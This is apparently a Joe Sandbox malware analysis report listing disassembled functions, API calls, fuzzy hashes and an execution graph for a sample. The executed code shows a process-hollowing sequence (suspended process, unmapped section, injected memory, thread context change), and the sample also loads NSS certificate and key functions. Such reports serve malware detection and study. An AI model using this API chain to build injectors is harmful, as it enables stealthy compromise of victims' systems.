                                                                        • Opcode ID: 7e8e35e858b108638980d6d7e1e17baf955cfc2ddcbe4743595041ff48c6fafd
                                                                        • Instruction ID: c26c84c02693767ceb7882dd57137628631692d571610bdfb1bec348c0eeddcb
                                                                        • Opcode Fuzzy Hash: 7e8e35e858b108638980d6d7e1e17baf955cfc2ddcbe4743595041ff48c6fafd
                                                                        • Instruction Fuzzy Hash: E56148716083418BD724CF14C890BABBBF5EF86318F058A1DE8DA5B281D7B49905DBA6
                                                                        Function 0057DB47 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0057DC71
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0057DCA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID: eI.K$qs
                                                                        • API String ID: 237503144-3936219367
                                                                        • Opcode ID: dc374d62b46038b04298b2915cbc0a4bfca21c88bdf5701a0e3bab2608cdf6d9
                                                                        • Instruction ID: ea2b59b089b95d7dd34d9846637e40c5b7d95b4e3187c5d6b3accc57fd65c96c
                                                                        • Opcode Fuzzy Hash: dc374d62b46038b04298b2915cbc0a4bfca21c88bdf5701a0e3bab2608cdf6d9
                                                                        • Instruction Fuzzy Hash: D45164B0100B049BD7348F26D894B67BBB5FF45314F548A1CE8A64FB89D7B0E808CBA4
                                                                        Function 00569107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 00569145
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                                        • API String ID: 621844428-2804141084
                                                                        • Opcode ID: 13dc76ea7de215e409e79daecf993f3e92855b2eb19abbbd6ec502212a96d9e6
                                                                        • Instruction ID: a7c6af01b9125c4b114ac289cef95de4aa3e627b7505c3facd21e2aa9ef585f8
                                                                        • Opcode Fuzzy Hash: 13dc76ea7de215e409e79daecf993f3e92855b2eb19abbbd6ec502212a96d9e6
                                                                        • Instruction Fuzzy Hash: 13F0FF74C087438ACB50BB71D64E16E7FACBFA6310F204D2AE49683191DB348486DA53
                                                                        Function 004131AE Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 363COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00413884
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 004138B5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID: V"
                                                                        • API String ID: 237503144-2019076553
                                                                        • Opcode ID: 217286694c207371e1da7005cc4ae52adee3662fce77df40bc553ada78db6358
                                                                        • Instruction ID: b8f590afc6553ff7605340d13dff726c6823d6bb3a5fa6397772a6377b5bee3a
                                                                        • Opcode Fuzzy Hash: 217286694c207371e1da7005cc4ae52adee3662fce77df40bc553ada78db6358
                                                                        • Instruction Fuzzy Hash: F8E138B05483828BD735CF14C854BEFBBE1BFC5309F48492DE89987282D7B999448F96
                                                                        Function 00573415 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 363COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00573AEB
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 00573B1C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID: V"
                                                                        • API String ID: 237503144-2019076553
                                                                        • Opcode ID: 95e61789491e88786c18cc1acbf7ba66db770f412e53d14d44e515f6fe15e3af
                                                                        • Instruction ID: 808a17e365bac1aef5eee43972936888bb59077cd72f94985a62aa9a01023079
                                                                        • Opcode Fuzzy Hash: 95e61789491e88786c18cc1acbf7ba66db770f412e53d14d44e515f6fe15e3af
                                                                        • Instruction Fuzzy Hash: C7E139B05483828BD735CF14C854BAFBBE1BFC5315F48492DE8D98B291D7BA59448F82
                                                                        Function 0042B932 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SysStringLen.OLEAUT32 ref: 0042B93C
                                                                          • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeapString
                                                                        • String ID: /$_
                                                                        • API String ID: 983180023-3328996620
                                                                        • Opcode ID: d44023c7fa751cd99fecb0c56439effa9c6e9bec1ea8780a3ad4dbaf278e243a
                                                                        • Instruction ID: 6447c4c98e9839bbfe30095b09fd38d16c8898c21f8e458fc47884f27b927c9d
                                                                        • Opcode Fuzzy Hash: d44023c7fa751cd99fecb0c56439effa9c6e9bec1ea8780a3ad4dbaf278e243a
                                                                        • Instruction Fuzzy Hash: EBA1D372B097918FC3398A28C8903DFBBD2ABD5320F584A2DD4E9873D1DB359841C786
                                                                        Function 0058BB99 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: String
                                                                        • String ID: /$_
                                                                        • API String ID: 2568140703-3328996620
                                                                        • Opcode ID: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
                                                                        • Instruction ID: f07f1d3f4961a51c6351dc140c0102b5f6d31027f138041fcc0dcf8f072e60a3
                                                                        • Opcode Fuzzy Hash: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
                                                                        • Instruction Fuzzy Hash: 7AA1B3726097818FD7399A28C8943DFBBD2BBD5310F194A6CD8E9973D1DB358844C742
                                                                        Function 0042AA0F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SysStringLen.OLEAUT32 ref: 0042AA1D
                                                                          • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeapString
                                                                        • String ID: /$_
                                                                        • API String ID: 983180023-3328996620
                                                                        • Opcode ID: 9aede850ce2b0562b1a47ca178639b777b8fa13a2b64741c4ce5cfbc508a3bf8
                                                                        • Instruction ID: c0f22b295fcd5dfa813694d41399a3aed2f8b54868401d176934dc4335e9d724
                                                                        • Opcode Fuzzy Hash: 9aede850ce2b0562b1a47ca178639b777b8fa13a2b64741c4ce5cfbc508a3bf8
                                                                        • Instruction Fuzzy Hash: B291A5327093918FC725CE28C8903DBBBE2ABD5314F594A6DD8E9873D1D6359841CB47
                                                                        Function 0058AC76 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: String
                                                                        • String ID: /$_
                                                                        • API String ID: 2568140703-3328996620
                                                                        • Opcode ID: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
                                                                        • Instruction ID: 0c38fc0a36744d5f30a00fdd0035a0537dec82f7a22c6489fcd5eb2f0b3e3d3d
                                                                        • Opcode Fuzzy Hash: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
                                                                        • Instruction Fuzzy Hash: 5791C4726093818FD339DE28C8903EABBE2BBD5314F194A6DD8E9973C1D6359801CB43
                                                                        Function 00422158 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 004222C9
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004222FE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings$AllocateHeap
                                                                        • String ID: hi
                                                                        • API String ID: 3432729115-3633523372
                                                                        • Opcode ID: 8b55fbbcc88d9df6fa81dab6b43a18f61d3329a4ef0902c7050ab2936a50fb1d
                                                                        • Instruction ID: 955b234eacedc5ad79a5fbc0d5aeb5eb286d5c951f72c93c1ad7127c08102aad
                                                                        • Opcode Fuzzy Hash: 8b55fbbcc88d9df6fa81dab6b43a18f61d3329a4ef0902c7050ab2936a50fb1d
                                                                        • Instruction Fuzzy Hash: 3F5187B06083919FE324CF14D8807ABBBE5FBC5704F90892DF9999B280CB749805CB97
                                                                        Function 005823BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 00582530
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00582565
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID: hi
                                                                        • API String ID: 237503144-3633523372
                                                                        • Opcode ID: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
                                                                        • Instruction ID: 2b01bffe7071b109dbdf5f755047c7d870a17b1d5d25a8dc41896b78ec441d0b
                                                                        • Opcode Fuzzy Hash: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
                                                                        • Instruction Fuzzy Hash: 394145B06083959FE724DF54C884BABBBE5FFC2740F90892CF9995B290D7748805CB92

                                                                        Execution Graph

                                                                        Execution Coverage:50.9%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:20.5%
                                                                        Total number of Nodes:39
                                                                        Total number of Limit Nodes:1
                                                                        execution_graph 391 437b010 392 437b049 391->392 393 437b0e1 392->393 401 4379850 392->401 397 437b115 419 4379fb0 397->419 399 437b1a7 422 437a4f0 NtAllocateVirtualMemory 399->422 402 4379875 401->402 403 4379fb0 VirtualAlloc 402->403 405 437990f 403->405 404 4379921 404->397 413 4379b10 404->413 405->404 406 4379989 NtCreateFile 405->406 407 4379a2b 406->407 412 4379a34 406->412 408 4379a36 CreateFileMappingA 407->408 407->412 409 4379a94 MapViewOfFile 408->409 411 4379a64 408->411 409->412 410 4379abc FindCloseChangeNotification 410->404 411->409 411->412 412->404 412->410 414 4379b5e 413->414 415 4379b77 414->415 416 4379c2d NtProtectVirtualMemory 414->416 415->397 431 437a150 416->431 420 4379ff1 419->420 421 437a024 VirtualAlloc 420->421 421->399 423 437a580 422->423 424 437a6f7 GetTempFileNameA 423->424 433 4379c90 424->433 426 437a71b CreateFileA WriteFile 427 437a780 CreateProcessA NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory 426->427 428 437a82a 427->428 429 437a88e Wow64GetThreadContext Wow64SetThreadContext ResumeThread ExitProcess 428->429 430 437a851 WriteProcessMemory 428->430 429->393 430->428 432 4379c5c NtProtectVirtualMemory 431->432 432->415 435 4379c95 433->435 436 437a0d0 437 4379fb0 VirtualAlloc 436->437 438 437a0dd 437->438

                                                                        Callgraph

                                                                        Executed Functions

                                                                        Function 0437A4F0 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 317threadmemoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0437A561
                                                                        • GetTempFileNameA.KERNELBASE(?,kate,00000000,?), ref: 0437A714
                                                                        • CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 0437A742
                                                                        • WriteFile.KERNELBASE(00000000,?,000D7400,00000000,00000000), ref: 0437A76C
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 0437A7B6
                                                                        • NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 0437A7D0
                                                                        • VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 0437A7FB
                                                                        • WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 0437A81F
                                                                        • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0437A881
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010002), ref: 0437A8AF
                                                                        • Wow64SetThreadContext.KERNEL32(?,00010002), ref: 0437A8DA
                                                                        • ResumeThread.KERNELBASE(?), ref: 0437A8EC
                                                                        • ExitProcess.KERNEL32(00000000), ref: 0437A8F9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.2305592154.0000000004379000.00000040.00001000.00020000.00000000.sdmp, Offset: 04379000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_4379000_D818.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$FileMemoryThreadWrite$ContextCreateVirtualWow64$AllocAllocateExitNameResumeSectionTempUnmapView
                                                                        • String ID: kate
                                                                        • API String ID: 1984375786-4076676908
                                                                        • Opcode ID: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                                                        • Instruction ID: d8708424f66d619c2d38d815a8bfd70f8401f56098593179315a41f666f8001e
                                                                        • Opcode Fuzzy Hash: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                                                        • Instruction Fuzzy Hash: 58E1D875A00208AFDB54CF84C895FEEB7B5BF88314F108199E908AB391D775AE85CF94
                                                                        Function 04379850 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191filenativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 04379FB0: VirtualAlloc.KERNELBASE(00000000,0437990F,00003000,00000040), ref: 0437A034
                                                                        • NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 04379A1B
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04379ACC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.2305592154.0000000004379000.00000040.00001000.00020000.00000000.sdmp, Offset: 04379000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_4379000_D818.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocChangeCloseCreateFileFindNotificationVirtual
                                                                        • String ID: @
                                                                        • API String ID: 482251274-2766056989
                                                                        • Opcode ID: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                                                        • Instruction ID: f3758be518e3f2b831d84cc997de612c00702dd738dbfcf787e9e71758988618
                                                                        • Opcode Fuzzy Hash: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                                                        • Instruction Fuzzy Hash: 91811E71A00218EFEB24DF54CC55FDAB3B5AF48710F1081E9EA09AB290D774AE84CF94
                                                                        Function 04379B10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 59 4379b10-4379b75 call 4379740 62 4379b77-4379b79 59->62 63 4379b7e-4379b93 59->63 64 4379c81-4379c84 62->64 65 4379b95-4379b97 63->65 66 4379b9c-4379bb4 63->66 65->64 67 4379bbf-4379bc9 66->67 68 4379c17-4379c1b 67->68 69 4379bcb-4379bdb 67->69 72 4379c1d-4379c21 68->72 73 4379c29-4379c2b 68->73 70 4379c15 69->70 71 4379bdd-4379c13 69->71 70->67 71->68 72->73 75 4379c23-4379c27 72->75 73->64 75->73 76 4379c2d-4379c7c NtProtectVirtualMemory call 437a150 NtProtectVirtualMemory 75->76 76->64
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.2305592154.0000000004379000.00000040.00001000.00020000.00000000.sdmp, Offset: 04379000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_4379000_D818.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .tex
                                                                        • API String ID: 0-1946526065
                                                                        • Opcode ID: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                                        • Instruction ID: 93200c1342bcb9daf2d713b3b44a228153cfeca16b6c2b69ebf3042c40659c17
                                                                        • Opcode Fuzzy Hash: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                                        • Instruction Fuzzy Hash: 0D51E6B1E00109DFDF14CF84C894BEEFBB5EF48314F149699D915AB290D739AA85CBA0
                                                                        Function 04379FB0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,0437990F,00003000,00000040), ref: 0437A034
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.2305592154.0000000004379000.00000040.00001000.00020000.00000000.sdmp, Offset: 04379000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_4379000_D818.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                                        • Instruction ID: c29bf9d456fbb5c36ba58800ee70a834af21d8cb692043a251a651dfdec5b2ba
                                                                        • Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                                        • Instruction Fuzzy Hash: F71100A0D082C9DAFF11DBE898097EFBFB55F11708F044098D5846A282D6BE575887B6

                                                                        Non-executed Functions

                                                                        Function 6CB77C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB77C33
                                                                        • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CB77C66
                                                                        • CERT_DestroyCertificate.NSS3(00000000), ref: 6CB77D1E
                                                                          • Part of subcall function 6CB77870: SECOID_FindOID_Util.NSS3(?,?,?,6CB791C5), ref: 6CB7788F
                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB77D48
                                                                        • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CB77D71
                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CB77DD3
                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB77DE1
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB77DF8
                                                                        • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB77E1A
                                                                        • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CB77E58
                                                                          • Part of subcall function 6CB77870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB791C5), ref: 6CB778BB
                                                                          • Part of subcall function 6CB77870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CB791C5), ref: 6CB778FA
                                                                          • Part of subcall function 6CB77870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CB791C5), ref: 6CB77930
                                                                          • Part of subcall function 6CB77870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB791C5), ref: 6CB77951
                                                                          • Part of subcall function 6CB77870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB77964
                                                                          • Part of subcall function 6CB77870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CB7797A
                                                                          • Part of subcall function 6CB77870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CB77988
                                                                          • Part of subcall function 6CB77870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CB77998
                                                                          • Part of subcall function 6CB77870: free.MOZGLUE(00000000), ref: 6CB779A7
                                                                          • Part of subcall function 6CB77870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CB791C5), ref: 6CB779BB
                                                                          • Part of subcall function 6CB77870: PR_GetCurrentThread.NSS3(?,?,?,?,6CB791C5), ref: 6CB779CA
                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB77E49
                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB77F8C
                                                                        • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB77F98
                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB77FBF
                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB77FD9
                                                                        • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CB78038
                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CB78050
                                                                        • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CB78093
                                                                        • SECOID_FindOID_Util.NSS3 ref: 6CB77F29
                                                                          • Part of subcall function 6CB707B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB18298,?,?,?,6CB0FCE5,?), ref: 6CB707BF
                                                                          • Part of subcall function 6CB707B0: PL_HashTableLookup.NSS3(?,?), ref: 6CB707E6
                                                                          • Part of subcall function 6CB707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB7081B
                                                                          • Part of subcall function 6CB707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB70825
                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CB78072
                                                                        • SECOID_FindOID_Util.NSS3 ref: 6CB780F5
                                                                          • Part of subcall function 6CB7BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CB7800A,00000000,?,00000000,?), ref: 6CB7BC3F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                        • String ID:
                                                                        • API String ID: 2815116071-0
                                                                        • Opcode ID: 579c3d8aef5dcc173b1c49dec14031094575eb80de67c9d5a80e36eedc494d4e
                                                                        • Instruction ID: 496ff086f192ed09febd084b1af520655a8ae3249b20901fe6ea6d9d2da6ebce
                                                                        • Opcode Fuzzy Hash: 579c3d8aef5dcc173b1c49dec14031094575eb80de67c9d5a80e36eedc494d4e
                                                                        • Instruction Fuzzy Hash: F5E182716083809FD721CF25C944B6A77E5EF44308F14496DECA9ABB51E772E805CBA3
                                                                        Function 6CB01C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 6CB01C6B
                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CB01C75
                                                                        • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CB01CA1
                                                                        • GetLengthSid.ADVAPI32(?), ref: 6CB01CA9
                                                                        • malloc.MOZGLUE(00000000), ref: 6CB01CB4
                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CB01CCC
                                                                        • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CB01CE4
                                                                        • GetLengthSid.ADVAPI32(?), ref: 6CB01CEC
                                                                        • malloc.MOZGLUE(00000000), ref: 6CB01CFD
                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CB01D0F
                                                                        • CloseHandle.KERNEL32(?), ref: 6CB01D17
                                                                        • AllocateAndInitializeSid.ADVAPI32 ref: 6CB01D4D
                                                                        • GetLastError.KERNEL32 ref: 6CB01D73
                                                                        • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CB01D7F
                                                                        Strings
                                                                        • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CB01D7A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
